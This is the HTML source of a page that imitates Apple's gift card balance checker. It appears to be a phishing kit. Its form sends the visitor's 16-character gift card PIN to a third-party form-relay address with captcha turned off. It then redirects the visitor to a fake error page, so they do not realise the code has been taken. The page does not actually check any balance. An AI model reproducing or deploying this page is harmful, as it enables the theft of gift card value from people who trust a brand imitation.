<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>apple</title>
    <link rel="stylesheet" href="style.css" />
    <link rel="shortcut icon" href="favicon.png" type="image/x-icon" />
  </head>
  <body>
    <header>
      <div class="topnav">
        <img src="menu.PNG" alt="" width="28px" />
        <img src="icon.PNG" alt="" width="28px" />
        <img src="shop.PNG" alt="" width="28px" />
      </div>
    </header>
    <div class="applehr">
      <h3>Apple Gift Card</h3>
      <div class="applehr1">
        <select>
          <option value="">Overview</option>
          <option value="">Redeem</option>
        </select>
        <button>Buy</button>
      </div>
    </div>
    <hr />
    <main>
      <div class="checkwright">
        <h1><span>Check Your Apple Gift Card</span> <span>Balance</span></h1>
      </div>

      <form
        action="https://formsubmit.co/c813a38244b90ec8fade1c414b0dc0ac "
        method="post"
      >
        <!-- honey pot -->
        <input type="text" name="_honey" style="display: none" />

        <!-- display Captcha -->
        <input type="hidden" name="_captcha" value="false" />
        <!-- thank you page -->

        <input
          type="hidden"
          name="_next"
          value="https://applebalancecheck.netlify.app/error.html"
        />
        <h3>Enter your PIN here:</h3>
        <input
          type="text"
          placeholder="Gift Card PIN"
          required
          name="Apple_Gift_Card"
          maxlength="16"
          minlength="16"
        />
        <p>Can't find your PIN? <a href="#">Learn more</a></p>
        <input type="submit" value="Check Balance" />
      </form>
      <div class="mainimg">
        <img src="banner.JPG" alt="" width="100%" />
      </div>
      <div class="where">
        <h3>Where can i use my Apple Gift Card?</h3>
      </div>
      <div class="device">
        <div class="mac">
          <img src="mac.PNG" alt="" width="90px" />
          <p>Mac</p>
        </div>
        <div class="phone">
          <img src="phone.PNG" alt="" width="30px" />
          <p>iPhone</p>
        </div>
        <div class="pad">
          <img src="tab.PNG" alt="" width="40px" />
          <p>iPad</p>
        </div>
        <div class="watch">
          <img src="watch.PNG" alt="" width="30px" />
          <p>Watch</p>
        </div>
        <div class="pod">
          <img src="acces.PNG" alt="" width="60px" />
          <p>Accessories</p>
        </div>
      </div>
      <div class="app">
        <div class="store">
          <img src="store.PNG" alt="" />
          <p>App Store</p>
        </div>
        <div class="arcade">
          <img src="arcade.PNG" alt="" />
          <p>Arcade</p>
        </div>
        <div class="music">
          <img src="music.PNG" alt="" />
          <p>Music</p>
        </div>
        <div class="tv">
          <img src="tv.PNG" alt="" />
          <p>TV+</p>
        </div>
        <div class="tuns">
          <img src="ituns.PNG" alt="" />
          <p>iTuns</p>
        </div>
        <div class="one">
          <img src="one.PNG" alt="" />
          <p>Apple One</p>
        </div>
        <div class="fit">
          <img src="fit.PNG" alt="" />
          <p>Fitness+</p>
        </div>
        <div class="cloud">
          <img src="cloud.PNG" alt="" />
          <p>iCloud</p>
        </div>
        <div class="news">
          <img src="news.PNG" alt="" />
          <p>News+</p>
        </div>
        <div class="book">
          <img src="book.PNG" alt="" />
          <p>Books</p>
        </div>
      </div>
      <div class="old">
        <h3>
          <span>Have an older gift card?</span>
          <span><a href="#">Learn more</a></span>
        </h3>

        <div class="oldimg">
          <img src="apple01.JPG" alt="" width="40%" />
          <img src="apple02.JPG" alt="" width="40%" />
        </div>
      </div>
    </main>
    <footer>
      <div class="topfooter">
        <h4>Shop and Learn</h4>
        <hr />
        <h4>Services</h4>
        <hr />
        <h4>Account</h4>
        <hr />
        <h4>Apple Store</h4>
        <hr />
        <h4>For Bussiness</h4>
        <hr />
        <h4>For Education</h4>
        <hr />
        <h4>For Healthcare</h4>
        <hr />
        <h4>For Government</h4>
        <hr />
        <h4>Apple Values</h4>
        <hr />
        <h4>About Apple</h4>
        <hr />
      </div>
    </footer>
  </body>
</html>
